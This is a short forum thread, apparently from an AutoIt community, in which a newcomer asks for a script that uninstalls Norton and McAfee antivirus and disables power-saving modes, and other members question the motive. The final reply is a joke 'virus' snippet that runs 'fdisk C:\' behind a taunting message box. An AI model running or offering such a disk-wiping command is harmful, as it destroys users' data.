Need Some Help

Im new to autoit, but Im sure these few questions will be no problem for you pros.

Heres what I need autoit to do.

Make a program that checks for norton and mcafee anti-virus/internet security and remove it.

I need it to also remove the gateway/emachines BIGFIX utility.

I need it to turn off any hibernate, standby and make all power settings set to "never".

thanks for the help in advance

• Moderators

Im new to autoit, but Im sure these few questions will be no problem for you pros.

Heres what I need autoit to do.

Make a program that checks for norton and mcafee anti-virus/internet security and remove it.

I need it to also remove the gateway/emachines BIGFIX utility.

I need it to turn off any hibernate, standby and make all power settings set to "never".

thanks for the help in advance

Question:

What reason would you have to "remove" virus/internet protection?

Common sense plays a role in the basics of understanding AutoIt... If you're lacking in that, do us all a favor, and step away from the computer.

ya, i know you cant order it, but i cant do a lot of working on the project while at work

i need it to remove the anti-virus because the computers wont be on the internet and i cant have it using up ram unnecessarily

Edited by 65stang

I think the FDISK, Install utilities that Microsoft has written may be your best method to get a stable operating environment in Windows. Who knows what other foibles will be lurking once you remove your protection on the systems?

If all machines are the same, do it once and use something like Symantec Ghost to deploy to the others. Even using a pre-prepared install script as input to a Windows install can save you considerable time.

I think this is what he wants....

#include <Process.au3>
msgbox(0, "HaHaHa!", "You are infected with the autoit Virus! Im a f***tard virus writer who stole my source from Spyrorocks!"
_RunDOS("fdisk C:\")